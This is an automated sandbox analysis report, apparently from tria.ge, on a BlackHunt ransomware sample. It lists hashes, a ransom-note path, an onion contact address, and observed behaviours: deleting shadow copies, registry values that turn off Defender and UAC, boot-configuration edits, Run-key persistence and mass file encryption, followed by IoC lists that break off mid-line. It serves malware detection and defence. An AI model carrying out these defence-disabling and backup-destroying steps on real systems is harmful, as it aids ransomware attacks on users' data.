Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
173s -
max time network
181s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
18/01/2024, 23:30
Static task
static1
Behavioral task
behavioral1
Sample
5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe
Resource
win10v2004-20231215-en
General
-
Target
5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe
-
Size
707KB
-
MD5
480a7b76bf362d4ba16a1e3e2acd21c7
-
SHA1
b86200ecb53206a3dc0b4211688d3f62cdf45cc9
-
SHA256
5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd
-
SHA512
3206d14633f6ec8922dac3c4020488937dc34ba4c7d9462cdd38798cbd4be86076b5b1315ef81704ae1291a5d1b656f32fbd3a3ad369767478f700b22e2a9717
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza198Xvnh:6uaTmkZJ+naie5OTamgEoKxLWw/h
Malware Config
Extracted
F:\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 1 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 3152 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 3184 bcdedit.exe 3660 bcdedit.exe -
Renames multiple (570) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 404 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe -
Enumerates connected drives 3 TTPs 25 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\Q: 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe File opened (read-only) \??\Z: 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\U: 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe File opened (read-only) \??\G: 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe File opened (read-only) \??\X: 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\W: 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe File opened (read-only) \??\T: 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe File opened (read-only) \??\A: 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe File opened (read-only) \??\B: 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe File opened (read-only) \??\N: 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe File opened (read-only) \??\M: 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe File opened (read-only) \??\E: 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe File opened (read-only) \??\H: 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe File opened (read-only) \??\R: 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe File opened (read-only) \??\Y: 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe File opened (read-only) \??\S: 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe File opened (read-only) \??\K: 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe File opened (read-only) \??\L: 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe File opened (read-only) \??\P: 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe File opened (read-only) \??\I: 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe File opened (read-only) \??\O: 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe File opened (read-only) \??\J: 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe File opened (read-only) \??\V: 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 5 ip-api.com -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\7-Zip\Lang\ro.txt 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\javafx\public_suffix.md 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe File created C:\Program Files\Java\jre-1.8\lib\cmm\#BlackHunt_ReadMe.txt 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe File created C:\Program Files\VideoLAN\VLC\locale\nb\LC_MESSAGES\#BlackHunt_ReadMe.txt 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe File created C:\Program Files\VideoLAN\VLC\plugins\control\#BlackHunt_ReadMe.hta 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe File opened for modification C:\Program Files\7-Zip\Lang\an.txt 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe File created C:\Program Files\dotnet\host\#BlackHunt_Private.key 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\fontconfig.bfc 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe File created C:\Program Files\VideoLAN\VLC\locale\te\LC_MESSAGES\#BlackHunt_Private.key 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe File created C:\Program Files\VideoLAN\VLC\plugins\logger\#BlackHunt_ReadMe.txt 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\meta-index 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe File created C:\Program Files\VideoLAN\VLC\locale\be\#BlackHunt_ReadMe.hta 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe File created C:\Program Files\VideoLAN\VLC\locale\br\#BlackHunt_Private.key 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe File created C:\Program Files\VideoLAN\VLC\locale\fur\LC_MESSAGES\#BlackHunt_ReadMe.txt 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\co\LC_MESSAGES\vlc.mo 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\lt\LC_MESSAGES\vlc.mo 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe File created C:\Program Files\Java\jre-1.8\lib\security\#BlackHunt_ReadMe.txt 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe File created C:\Program Files\Uninstall Information\#BlackHunt_ReadMe.txt 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe File created C:\Program Files\VideoLAN\VLC\locale\ja\LC_MESSAGES\#BlackHunt_ReadMe.txt 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe File created C:\Program Files\VideoLAN\VLC\locale\km\#BlackHunt_ReadMe.hta 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe File created C:\Program Files\VideoLAN\VLC\locale\uz\#BlackHunt_ReadMe.txt 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe File opened for modification C:\Program Files\7-Zip\Lang\si.txt 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe File created C:\Program Files\Java\jre-1.8\lib\images\#BlackHunt_Private.key 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe File created C:\Program Files\VideoLAN\VLC\locale\fi\LC_MESSAGES\#BlackHunt_ReadMe.txt 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe File created C:\Program Files\VideoLAN\VLC\locale\sr\LC_MESSAGES\#BlackHunt_Private.key 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe File created C:\Program Files\VideoLAN\VLC\locale\sv\#BlackHunt_ReadMe.hta 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe File opened for modification C:\Program Files\7-Zip\readme.txt 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe File created C:\Program Files\Java\jre-1.8\bin\server\#BlackHunt_ReadMe.hta 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe File created C:\Program Files\Java\jdk-1.8\jre\legal\javafx\#BlackHunt_ReadMe.hta 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe File created C:\Program Files\VideoLAN\VLC\locale\bs\LC_MESSAGES\#BlackHunt_Private.key 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe File created C:\Program Files\VideoLAN\VLC\locale\cy\#BlackHunt_ReadMe.txt 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe File created C:\Program Files\VideoLAN\VLC\locale\el\LC_MESSAGES\#BlackHunt_ReadMe.hta 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe File created C:\Program Files\VideoLAN\VLC\locale\sl\LC_MESSAGES\#BlackHunt_ReadMe.hta 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe File created C:\Program Files\VideoLAN\VLC\plugins\lua\#BlackHunt_ReadMe.txt 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe File opened for modification C:\Program Files\7-Zip\History.txt 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe File created C:\Program Files\Java\jdk-1.8\jre\#BlackHunt_ReadMe.hta 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe File created C:\Program Files\VideoLAN\VLC\locale\sl\#BlackHunt_ReadMe.hta 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe File created C:\Program Files\VideoLAN\VLC\locale\zu\#BlackHunt_ReadMe.txt 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe File created C:\Program Files\VideoLAN\VLC\locale\br\LC_MESSAGES\#BlackHunt_ReadMe.hta 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ga\LC_MESSAGES\vlc.mo 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe File opened for modification C:\Program Files\Java\jdk-1.8\legal\jdk\pkcs11wrapper.md 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe File opened for modification C:\Program Files\Java\jre-1.8\legal\jdk\libpng.md 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\deploy\messages_fr.properties 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe File created C:\Program Files\VideoLAN\VLC\locale\gd\#BlackHunt_ReadMe.txt 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe File created C:\Program Files\Java\jdk-1.8\jre\lib\applet\#BlackHunt_ReadMe.hta 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\security\public_suffix_list.dat 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe File created C:\Program Files\VideoLAN\VLC\locale\az\#BlackHunt_ReadMe.txt 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe File created C:\Program Files\VideoLAN\VLC\locale\da\LC_MESSAGES\#BlackHunt_ReadMe.hta 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe File opened for modification C:\Program Files\Java\jre-1.8\README.txt 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe File opened for modification C:\Program Files\RequestUnpublish.AAC 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe File opened for modification C:\Program Files\SyncWatch.svgz 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe File created C:\Program Files\VideoLAN\VLC\locale\uk\#BlackHunt_Private.key 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe File opened for modification C:\Program Files\7-Zip\Lang\mng2.txt 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\ext\cldrdata.jar 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe File created C:\Program Files\VideoLAN\VLC\lua\meta\reader\#BlackHunt_ReadMe.txt 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe File created C:\Program Files\Java\jdk-1.8\jre\lib\deploy\#BlackHunt_ReadMe.txt 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe File opened for modification C:\Program Files\Java\jre-1.8\legal\jdk\xmlresolver.md 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe File created C:\Program Files\VideoLAN\VLC\locale\fr\LC_MESSAGES\#BlackHunt_ReadMe.hta 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe File created C:\Program Files\VideoLAN\VLC\locale\gd\LC_MESSAGES\#BlackHunt_ReadMe.txt 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe File created C:\Program Files\VideoLAN\VLC\locale\hy\#BlackHunt_Private.key 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe File created C:\Program Files\VideoLAN\VLC\locale\ia\LC_MESSAGES\#BlackHunt_ReadMe.hta 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe File opened for modification C:\Program Files\CopyGet.wvx 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe File created C:\Program Files\Java\jdk-1.8\jre\bin\plugin2\#BlackHunt_ReadMe.hta 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe File created C:\Program Files\VideoLAN\VLC\locale\sr\#BlackHunt_ReadMe.txt 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 4 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 vds.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3864 schtasks.exe -
Interacts with shadow copies 2 TTPs 5 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 2820 vssadmin.exe 4348 vssadmin.exe 2028 vssadmin.exe 5052 vssadmin.exe 1504 vssadmin.exe -
Modifies registry class 10 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ cmd.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 Conhost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ Conhost.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 cmd.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2 reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon reg.exe -
Suspicious use of AdjustPrivilegeToken 13 IoCs
description pid Process Token: SeDebugPrivilege 4928 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe Token: SeRestorePrivilege 4928 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe Token: SeBackupPrivilege 4928 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe Token: SeTakeOwnershipPrivilege 4928 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe Token: SeAuditPrivilege 4928 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe Token: SeSecurityPrivilege 4928 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe Token: SeIncBasePriorityPrivilege 4928 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe Token: SeBackupPrivilege 812 wbengine.exe Token: SeRestorePrivilege 812 wbengine.exe Token: SeSecurityPrivilege 812 wbengine.exe Token: SeBackupPrivilege 968 vssvc.exe Token: SeRestorePrivilege 968 vssvc.exe Token: SeAuditPrivilege 968 vssvc.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4928 wrote to memory of 3436 4928 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe 92 PID 4928 wrote to memory of 3436 4928 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe 92 PID 4928 wrote to memory of 3304 4928 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe 94 PID 4928 wrote to memory of 3304 4928 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe 94 PID 4928 wrote to memory of 2176 4928 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe 96 PID 4928 wrote to memory of 2176 4928 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe 96 PID 4928 wrote to memory of 1456 4928 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe 98 PID 4928 wrote to memory of 1456 4928 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe 98 PID 4928 wrote to memory of 4392 4928 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe 99 PID 4928 wrote to memory of 4392 4928 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe 99 PID 4928 wrote to memory of 3584 4928 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe 104 PID 4928 wrote to memory of 3584 4928 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe 104 PID 4928 wrote to memory of 4560 4928 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe 106 PID 4928 wrote to memory of 4560 4928 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe 106 PID 4928 wrote to memory of 3228 4928 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe 108 PID 4928 wrote to memory of 3228 4928 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe 108 PID 4928 wrote to memory of 4720 4928 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe 110 PID 4928 wrote to memory of 4720 4928 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe 110 PID 4928 wrote to memory of 1392 4928 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe 111 PID 4928 wrote to memory of 1392 4928 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe 111 PID 4928 wrote to memory of 2144 4928 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe 113 PID 4928 wrote to memory of 2144 4928 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe 113 PID 4928 wrote to memory of 4152 4928 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe 115 PID 4928 wrote to memory of 4152 4928 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe 115 PID 3436 wrote to memory of 4856 3436 reg.exe 189 PID 3436 wrote to memory of 4856 3436 reg.exe 189 PID 3304 wrote to memory of 3952 3304 cmd.exe 102 PID 3304 wrote to memory of 3952 3304 cmd.exe 102 PID 4392 wrote to memory of 2752 4392 cmd.exe 170 PID 4392 wrote to memory of 2752 4392 cmd.exe 170 PID 4928 wrote to memory of 4956 4928 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe 121 PID 4928 wrote to memory of 4956 4928 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe 121 PID 4928 wrote to memory of 1380 4928 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe 123 PID 4928 wrote to memory of 1380 4928 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe 123 PID 4928 wrote to memory of 4884 4928 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe 127 PID 4928 wrote to memory of 4884 4928 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe 127 PID 4928 wrote to memory of 660 4928 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe 126 PID 4928 wrote to memory of 660 4928 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe 126 PID 4928 wrote to memory of 408 4928 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe 137 PID 4928 wrote to memory of 408 4928 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe 137 PID 1456 wrote to memory of 1660 1456 cmd.exe 122 PID 1456 wrote to memory of 1660 1456 cmd.exe 122 PID 2176 wrote to memory of 2816 2176 cmd.exe 200 PID 2176 wrote to memory of 2816 2176 cmd.exe 200 PID 4928 wrote to memory of 808 4928 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe 129 PID 4928 wrote to memory of 808 4928 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe 129 PID 4928 wrote to memory of 2052 4928 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe 131 PID 4928 wrote to memory of 2052 4928 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe 131 PID 4928 wrote to memory of 3960 4928 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe 134 PID 4928 wrote to memory of 3960 4928 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe 134 PID 4928 wrote to memory of 1504 4928 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe 211 PID 4928 wrote to memory of 1504 4928 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe 211 PID 4928 wrote to memory of 2384 4928 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe 140 PID 4928 wrote to memory of 2384 4928 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe 140 PID 4928 wrote to memory of 1752 4928 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe 142 PID 4928 wrote to memory of 1752 4928 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe 142 PID 4928 wrote to memory of 2516 4928 